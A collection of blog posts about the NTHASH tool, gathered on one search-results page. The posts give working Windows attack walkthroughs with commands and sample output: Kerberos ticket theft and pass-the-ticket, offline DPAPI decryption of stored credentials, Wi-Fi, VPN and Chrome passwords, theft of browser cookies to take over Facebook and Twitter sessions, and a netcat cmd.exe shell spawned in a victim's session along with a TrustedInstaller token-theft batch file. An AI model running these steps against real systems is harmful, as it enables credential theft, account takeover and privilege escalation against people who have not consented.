Résultats de recherche : nthash

Oct 312022
 

We will be discussing privilege escalation and/or lateral movement.

The theory.

You got yourself access to a host where other users (preferably local or domain admins) are logged on?

Lets:
-List the kerberos ticket(s) with nthash-win64 /klist
-Export the tgs ticket with nthash-win64 /ask /input:service/fqdn
-Import (in another session, or another host) the (preferably tgs) ticket with nthash-win64 /binary:ticket.kirbi

Note 1 : an admin can touch on all tickets (pass on the luid parameter on)
Note 2 : if the host2/attacker is a domain joined computer, a tgt ticket may be enough (your host « should » handle the tgs when you request a service)
Note 3 : this is not about requesting/forging a ticket (see rubeus) but about stealing a ticket

Practical example.

On host1/victim, we can witness that the logged on user (user1) has access to a remote share.

dir \\WIN-BBC4BS466Q5.home.lab\temp
Le volume dans le lecteur \WIN-BBC4BS466Q5.home.lab\temp n’a pas de nom.
Le numéro de série du volume est 763C-BB7B

Répertoire de \WIN-BBC4BS466Q5.home.lab\temp

20/02/2022 21:21 .
20/02/2022 21:21 ..
27/07/2022 17:09 1 313 792 NTHASH-win64.exe
1 fichier(s) 1 313 792 octets
2 Rép(s) 971 288 576 octets libres

And indeed, there is a ticket which we may want to steal (cifs/WIN-BBC4BS466Q5.home.lab).

nthash-win64.exe /klist
NTHASH 1.8 x64 by erwan2212@gmail.com

EncryptionType:00000012
StartTime:31/10/2022 16:26:32
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:krbtgt/home.lab
Client Name:user1
Flags:40E10000

EncryptionType:00000012
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:cifs/WIN-BBC4BS466Q5.home.lab
Client Name:user1
Flags:40A50000

Lets export this ticket to a file (which we will be importing later on).

nthash-win64.exe /ask /input:cifs/WIN-BBC4BS466Q5.home.lab
NTHASH 1.8 x64 by erwan2212@gmail.com
Asking for: cifs/WIN-BBC4BS466Q5.home.lab
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewUntil:07/11/2022 16:26:32
ServiceName: cifs/WIN-BBC4BS466Q5.home.lab
ClientName: user1
Flags: 40A50000
KeyType: 00000012
Key:C569A92747E0972A624943E4D99EF1D6BC7CADC7E379E928179BDE816DB419A3
TicketEncType: 00000012
Ticket:6182040630820402A003020105A10A1B08484F4D452E4C4142A22B3029A00302

* KiRBi to file:40A50000-user1@cifs-WIN-BBC4BS466Q5.home.lab.kirbi

On host2/attacker, we witness that we do not have (yet) access to the target remote share.

dir \\WIN-BBC4BS466Q5.home.lab\temp
Le nom d’utilisateur ou le mot de passe est incorrect.

Lets import our ticket (exported in previous step).

NTHASH-win64.exe /ptt /binary:40A50000-user1@cifs-WIN-BBC4BS466Q5.home.lab.kirbi
NTHASH 1.8 x64 by erwan2212@gmail.com
Ticket successfully submitted for current session

Lets confirm that our ticket now appears in our current (attacker) session.

NTHASH-win64.exe /klist
NTHASH 1.8 x64 by erwan2212@gmail.com

EncryptionType:00000012
StartTime:31/10/2022 16:26:41
EndTime:01/11/2022 02:26:32
RenewTime:07/11/2022 16:26:32
Server Name:cifs/WIN-BBC4BS466Q5.home.lab
Client Name:user1
Flags:40A50000

Lets now finally confirm that we do have access to the remote share (although we are not impersonating the original « user1 » , nor do we know user1 password).

dir \WIN-BBC4BS466Q5.home.lab\temp
Le volume dans le lecteur \WIN-BBC4BS466Q5.home.lab\temp n’a pas de nom.
Le numéro de série du volume est 763C-BB7B

Répertoire de \WIN-BBC4BS466Q5.home.lab\temp

20/02/2022 21:21 .
20/02/2022 21:21 ..
27/07/2022 17:09 1 313 792 NTHASH-win64.exe
1 fichier(s) 1 313 792 octets
2 Rép(s) 971 296 768 octets libres

Jan 272020
 

We now know that dpapi secrets are everywhere stored in various ways.

Lets have a look at the popular vpn client : NordVPN.
NordVPN stores its secrets (username/password) on a config file (xml format) and is using a machine scope (not good if you ask me…).

Lets see how to decrypt it.

1-Retrieve nordvpn user.config in c:\users\username\appdata\local\nordvpn\nordvpn.exe_url_xxxx\

2-Retrieve the base64 values for username and password

example below of a base64 string
AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALZTWkDFPOEa3VtEe+pBuUgQAAAACAAAAAAAQZgAAAAEAACAA
AABhL95rOFK1DD7EGJuziDclFhO1iTEpeB+zeqiKMjtH9AAAAAAOgAAAAAIAACAAAACpExW4x7XOO2zx
xi68pSpDiifZuCHq5fXrywC+9RWRmhAAAAAS4jvclZ2m/cTAaSjyW8iDQAAAAESj99ovArBss2PNqBm/
NTKsEVvnuOB+ZDqAQkD7GiwtOM4cy2rvQMnuioacujUkCf0coMPHT9wO+KP3MIHNLto=

3-Decode it to a hexa string

echo base64string| nthash-win64 /base64decodehexa

4-Save the hexa string to a file

echo hexastring| nthash-win64 /hexatofile

or … steps 2,3 and 4 can be done in one go (pipe in…pipe out…) like below

echo base64string| nthash-win64 /base64decodehexa | nthash-win64 /hexatofile

5-Retrieve the mk guid
nthash-win64 /decodeblob

6-Retrieve the dpapy system key

nthash-win64 /dumpsecret /input:dpapi_system /mode:machine /offline
(if machine key does not work, try user key)

7-Decrypt the (encrypted) masterkey

echo mydpapisyskey| nthash-win64 /decodemk /binary:c:\Windows\System32\Microsoft\ProtectS-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52

8-Finally, decrypt the dpapi blob

echo mymksha1key| nthash-win64 /decodeblob

or … steps 6,7 and 8 can be done in one go like below

NTHASH-win64.exe /dumpsecret /input:dpapi_system /mode:machine /offline | nthash-win64 /decodemk /binary:C:\Windows\System32\Microsoft\Protect\S-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52 | nthash-win64 /decodeblob

Note that, online, any user logged on that machine, could simple do the below

echo base64string| nthash-win64 /base64decodehexa | NTHASH-win64 /cryptunprotectdata

Jan 172020
 

In previous articles we have seen how to decrypt dpapi blobs.

Dpapi blobs are not always stored in file blobs.
They can be stored in different places like registry, config file, etc and in various formats such as hexadecimal string, but also base64 strings, etc.

Lets have a look at how Windows stores wifi passwords.

These are stored in xml files in C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces.
You can easily be found with : dir %programdata% /s /a /b | findstr /i interfaces.

When logged as the user, you can decrypt it with the below command :

NTHASH-win64 /wlansvc /binary:C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{2799BE4D-A2D4-417D-A774-481DBE1FF7FC}\{98B3A77A-3A5A-44A1-81AE-DDB88A168B24}.xml /system

Good news is that we can also decrypt it these offline.

Run the above command.
NTHASH will tell you that it failed to decrypt it BUT it will dump the blob to data.blob.

From there (and using the same steps as in this article):
-use /decodeblob to identify the masterkey guid
-use /decodemk to decrypt the masterkey (locate it with dir %systemroot%\System32\Microsoft\Protect /s /a /b | findstr /i myguid) using the dpapi system key.
-use /decodeblob again but this time supplying the SHA1 key obtained in previous step
-done 🙂

Jan 032020
 

In previous articles we have seen how to decrypt dpapi blobs.

What about chrome?
It uses user dpapi blobs to encrypt password in a sqlite db.
So following previous articles, nothing prevents one to decrypt a chrome db offline.

3 steps:
-retrieve the scrambled passwords along with the masterkey guid
-decrypt the masterkey
-retrieve the decrypted passwords with the decrypted masterkey

1/retrieve the scrambled passwords along with the masterkey guid

nthash-win64 /chrome /binary:C:\temp\login data /input:0000000000000000000000000000000000000000

2/decrypt the masterkey (identified by its guid in previous steps)
See previous article for more details about this steps.

NTHASH-win64.exe /decodemk /binary:C:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-242
7513087-2265021005-1965656450-1001\ae222549-867a-4269-b29f-49500e8842c8 /input:xxE0CExx8C9903BxxDC5F1D8190xx33CF7C3DBxx

NTHASH 1.7 x64 by erwan2212@gmail.com
**** Unprotecting MasterKey ****
KEY:83D3D812E50FABxx83DA070D6C566DxxE3248A1AD873AxxD222F6B41342xx0EEBD790388FE2A
21680A081723AA0C7B39EFxx5B16BB5xx48B94714xx38F1F5383
SHA1:xx920930CFB2A1CExxF9CB52153025535F548Fxx

3/retrieve the decrypted passwords with the decrypted masterkey

nthash-win64 /chrome /binary:C:\temp\login data /input:xx920930CFB2A1CExxF9CB52153025535F548Fxx

Jan 032020
 

In previous articles, we have seen how to decrypt user blobs and system blobs.

Lets now have a look at machine blobs : a blob which can be decrypted by any user provided it is decrypted on the same machine – as opposed to user blobs which can only be decrypted by the user.

5 steps:
-lets encrypt a blob
-lets decode the encrypted machine blob
-lets retrieve the dpapy system key & decrypt the masterkey
-lets decrypt the encrypted machine blob
-conclusion

1/lets encrypt a blob

Lets encrypt a string = password

NTHASH-win64.exe /cryptprotectdata /input:password /mode:MACHINE

2/lets decode the encrypted machine blob

NTHASH-win64.exe /decodeblob /data.blob

->note dwflags=4=machine

3/lets retrieve the dpapy system key & decrypt the masterkey

NTHASH-win64.exe /dumpsecret /input:dpapi_system /system
NTHASH 1.7 x64 by erwan2212@gmail.com
Impersonate:Syst?me
Full:xx3CA961B1DCExxDF06CB359D981C1A3EB1D47xxxx398A7D34786F8DxxC152F318A4EDFFAxx
2F73F
Machine:xx3CA961B1DCExxDF06CB359D981C1A3EB1D47xx
User:xx398A7D34786F8DxxC152F318A4EDFFAF02F7xx

NTHASH-win64.exe /decodemk
/binary:C:\Windows\System32\Microsoft\Protect\S-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52
/input:xx398A7D34786F8DxxC152F318A4EDFFAF02F7xx

**** Unprotecting MasterKey ****
KEY:xx99D247D53699114CA06378DB77E4xxDD08A6BABBDB5277EB59C8309DBA8AA8B2D4C7990052
5F2FEE3909AC3894931093DxxD4BED96484791E2DCF512EB38E7
SHA1:xx017C46F5651Bxx27831F87050694FAD1B4DBxx

4/lets decrypt the encrypted machine blob

nthash-win64 /decodeblob /binary:data.blob /input:54017C46F5651B9627831F87050694FAD1B4DB31
NTHASH 1.7 x64 by erwan2212@gmail.com
**** Unprotecting Blob ****
Blob:70617373776F7264

70617373776F7264 is hexa form of password

5/conclusion

Similar to system blobs, once you have the dpapi system key, it is rather trivial to decrypt such blob.
Furthermore, it is not recommanded to use machine blobs to store secrets as any user on that machine will be able to decrypt it.

Déc 312019
 

In previous article, we have decrypted user blob/credentials.
This time lets decrypt system credentials.

5 steps:
-look at the encrypted blob/credential
-look at the encrypted masterkey
-retrieve dpapi system key used
-decrypt the encrypted masterkey
-decrypt the encrypted blob/credential
-conclusion

1/look at the encrypted blob/credential

System credentials are located here:
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

nthash-win64 /decodeblob
/binary:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

->note the dwFlags:20000000 = system

2/look at the encrypted masterkey

Masterkeys are located here:
C:\Windows\System32\Microsoft\Protect

NTHASH-win64.exe /decodemk
/binary:C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\085027a7-b332-4d46-b9d1-743b668d378d

3/retrieve dpapi system key used

Because we are dealing with system blobs/credentials, and because « system » is not a user, we wont be fetching the sha1 password.
Rather, we will be using the dpapi system key to decrypt the masterkey.
Because we do this offline, you need the security.sav hive in the same folder as nthash.

NTHASH-win64.exe /dumpsecret /input:dpapi_system /offline
NTHASH 1.7 x64 by erwan2212@gmail.com

Offline=true
Full:XX3CA961B1DCEB7DF0XXB359D981C1A3EB1D472FXX398A7D34786F8D5FXX52F318A4EDFFAF0
2F7XX
Machine:XX3CA961B1DCEB7DF0XXB359D981C1A3EB1D472F
User:xx398A7D34786F8D5FXX52F318A4EDFFAF02F7XX

4/decrypt the encrypted masterkey

NTHASH-win64.exe /decodemk
/binary:C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\085027a7-b332-4d46-b9d1-743b668d378d
/input:8B398A7D34786F8D5FXX52F318A4EDFFAF02F7XX

**** Unprotecting MasterKey ****
KEY:4136467C1A3CC9C4BB0495BF639ED57269D10E47A333D6C8E21855E39B697FA1DAEB27EE2B80
0CD79362676D5AB79073EC642ADA0FB4E732B82E817812E75C26
SHA1:XX9042755B4CA2XX55FFB1F41CEDE6CD17116FXX

5/decrypt the encrypted blob/credential

nthash-win64 /decodeblob
/binary:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /input:XX9042755B4CA2XX55FFB1F41CEDE6CD17116FXX

**** Decoding Cred Blob ****
credFlags:48
credSize:3170
Type:1
Flags:0
LastWritten:31/10/2019 16:56:52
TargetName:WindowsLive:target=virtualapp/didlogical
unkdata:
comment:PersistedCredential
targetalias:
username:somerandomuser
CredentialBlob:somerandomblob

6/Conclusion?

Retrieving the dpapi system is even more trivial compared to retrieving the user password (cleartext or sha1) as it is stored in the registry.
All you need is the blob, the associated masterkey and the dpapi system key stored in the registry.

Déc 302019
 

Lets decrypt a user credentials (which happen to be enctyped in dpapi blobs).

5 steps:
-look at the encrypted blob/credential
-look at the encrypted masterkey
-retrieve the sha1 user password and compute the sha1-hmac key
-decrypt the encrypted masterkey
-decrypt the encrypted blob/credential
-conclusion

1/look at the encrypted blob/credential

User credentials are located here:
C:\Users\username\AppData\Roaming\Microsoft\Credentials
C:\Users\username\AppData\Local\Microsoft\Credentials

NTHASH-win64.exe /decodeblob
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Credentials\444F0F078CB16849842B0928EF18C7E1

->note the dwFlags:0 = user
We can see it is using masterkey ae222549-867a-4269-b29f-49500e8842c8.

2/look at the encrypted masterkey

Masterkeys are located here:
C:\Users\username\AppData\Roaming\Microsoft\Protect\sid

NTHASH-win64.exe /decodemk
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-2427513087-2265021005-1965656450-1001\ae222549-867a-4269-b29f-49500e8842c8

3/retrieve the sha1 user password and compute the sha1-hmac key

To decrypt this masterkey, you either know the cleartext password or you know its SHA1 form (retrieved thru some other lateral movements).

If you know the cleartext password, then lets computer its SHA1.
Skip the below if you already have the SHA1 password.

NTHASH-win64.exe /widestringtohexa /input:Password12345
NTHASH 1.7 x64 by erwan2212@gmail.com

widestringtobyte
500061007300730077006F007200640031003200330034003500

NTHASH-win64.exe /gethash /mode:SHA1 /input:5500061007300730077006F007200640031003200330034003500
NTHASH 1.7 x64 by erwan2212@gmail.com
gethash
0D32ECD47EDA6A1D3FFA259089B59798DE1D7CE0

Note that you can run the 2 previous commands in one go :
NTHASH-win64.exe /widestringtohexa /input:Password12345 | NTHASH-win64.exe /gethash /mode:SHA1

Now, lets compute the sha1-hmac key to decrypt the masterkey.
For this we need the SHA1 password + user sid.

NTHASH-win64.exe /widestringtohexa /input:S-1-5-21-2427513087-2265021005-1965656450-1001\0
NTHASH 1.8 x64 by erwan2212@gmail.com
widestringtobyte
53002D0031002D0035002D00320031002D0032003400320037003500310033003000380037002D0032003200360035003000320031003000300035002D0031003900360035003600350036003400350030002D0031003000300031000000

(Note the \0 to make it a null widechar terminated string)

NTHASH-win64.exe /gethmac /mode:SHA1 /key:0D32ECD47EDA6A1D3FFA259089B59798DE1D7CE0
/input:530020031002D0035002D00320031002D0032003400320037003500310033003000380037002D0032003
00360035003000320031003000300035002D0031003900360035003600350036003400350030002
0031003000300031000000

NTHASH 1.7 x64 by erwan2212@gmail.com
gethmac
262FA2EFDE8F5C9F525DAD764B6710D663BA5DA5

4/decrypt the encrypted masterkey

NTHASH-win64.exe /decodemk
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-2427513087-2265021005-1965656450-1001\ae222549-867a-4269-b29f-49500e8842c8
/input:262FA2EFDE8F5C9F525DAD764B6710D663BA5DA5

NTHASH 1.7 x64 by erwan2212@gmail.com
**** Unprotecting Blob ****
KEY:83D3D812E50FAB6F83DA070D6C566DCFE3248A1AD873AA1D222F6B41342890EEBD790388FE2A
21680A081723AA0C7B39EFBA5B16BB5D948B947140838F1F5383
SHA1:38920930CFB2A1CE61F9CB52153025535F548F53

Note : with latest version you can skip step 3 and execute the below (i.e provide the SHA1 user password and let NTHASH compute the hmac):
nthash-win64 /decodemk
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-2427513087-2265021005-1965656450-1001\75380869-42A8-42EC-9E9B-8518F42802EE
/password:0D32ECD47EDA6A1D3FFA259089B59798DE1D7CE0

5/decrypt the encrypted blob/credential

nthash-win64 /decodeblob
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Credentials\444F0F078CB16849842B0928EF18C7E1
/input:38920930CFB2A1CE61F9CB52153025535F548F53

NTHASH 1.7 x64 by erwan2212@gmail.com
**** Decoding Cred Blob ****
credFlags:48
credSize:194
Type:2
Flags:0
LastWritten:15/12/2019 19:16:09
TargetName:Domain:target=192.168.1.188
unkdata:
comment:SspiPfc
targetalias:
username:ERWAN-PC2\administrateur
CredentialBlob:weakpassword

You can run it in one command eventually:
nthash-win64 /decodemk
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-2427513087-2265021005-1965656450-1001\75380869-42A8-42EC-9E9B-8518F42802EE
/password:0D32ECD47EDA6A1D3FFA259089B59798DE1D7CE0 | nthash-win64 /decodeblob
/binary:C:\Users\erwan\AppData\Roaming\Microsoft\Credentials\444F0F078CB16849842B0928EF18C7E1

6/Conclusion ?

You dont need to be online or run as the user to retrieve secrets :
If you own a blob, its associated masterkey and the cleartext password OR the sha1 password, you can decrypt these offline.

Déc 302019
 

In previous articles about lateral movement, we have mostly used « live » scenarios where we would either run as the victim user or we would dump secrets from (lsass) memory.

This time, lets look at dpapi secrets in « offline » scenarios.

About DPAPI, see wikipedia.

DPAPI (Data Protection Application Programming Interface) is a simple cryptographic application programming interface available as a built-in component in Windows 2000 and later versions of Microsoft Windows operating systems. In theory the Data Protection API can enable symmetric encryption of any kind of data; in practice, its primary use in the Windows operating system is to perform symmetric encryption of asymmetric private keys, using a user or system secret as a significant contribution of entropy.

DPAPI secrets are made of :
-a blob containing encrypted data, linked to a masterkey (used to decrypt the blob)
-a masterkey containing one (or several) encrypted key(s)

To decrypt a masterkey (and therefore a blob), you need the below:
-non-domain context: SID AND user password (when the masterkey was created) SHA1 hash
-domain context: SID AND user password (when the masterkey was created) NTLM hash
-local computer: DPAPI_SYSTEM secret (COMPUTER or USER part)

In the next 3 (+1) articles, we will see how to decrypt dpapi secrets.

Before doing so, I recommend reading this article.

Also, most part of the knowledge and coding is greatly (understatement here) inspired by the excellent work (another understatement) from Gentilwiki and Mimikatz.

Oct 312019
 

This is the 9th and last article of a series of articles around performing lateral movement.

Goal is still about performing a task as another user but without knowing that user password.

This time, lets take a look at « cookies« .
Quoting Wikipedia : « …is a small piece of data sent from a website and stored on the user’s computer by the user’s web browser while the user is browsing… ».

1.Based on previous articles, lets consider you have acquired a context/shell running as another user.

2.Retrieve the chrome cookie you are after with NTHASH-win64.exe /ccookies | findstr /i facebook.com or the firefox cookie you are after with NTHASH-win64.exe /fcookies | findstr /i facebook.com

3.Launch a chrome with a new/blank profile (in your session) : « C:\Program File
s (x86)\Google\Chrome\Application\chrome » –profile-directory= »temp »

4.Install a « cookie » chrome extension like EditThisCookie

5.Inject the cookie:
-in facebook case, you need to inject value xs and c_user
-in twitter case, you need to inject auth_token

And here you go, you can log into a web service, as another user, without knowing his credentials.

Note that this method may not be 100% bullet proof :
-you need to know which value(s) you need to inject
-some web services may perform extra checks

Oct 302019
 

In previous article we have (ab)used windows tokens to steal someone else account.

Lets see a different way to perform this task (ab)using terminal services.

1.Retrieve the session id of your victim with qwinsta

2.Open a shell (within the attacker session) to which your victim will connect to : nc -L -vv -p 9000

3.Spawn a process within your victim session which will connect back to your shell : NTHASH-win64.exe /runts /user:session_id /binary:nc 127.0.0.1 9000 -e cmd.exe

And again, enjoy the output of your whoami.

Note that you need special privileges (SeTcbPrivilege) to perform step 3 – my preference goes to using a « trustedinstaller » session (but many other context will do like winlogon, etc).

If need be, the below batch will create a new shell with proper privileges to perform step 3 above.

@echo off
net start trustedinstaller
for /F "tokens=1" %%K in (' nthash-win64 /enumproc ^| findstr /i "trustedinstaller" ') do ( nthash-win64 /runastoken /pid:%%K /system )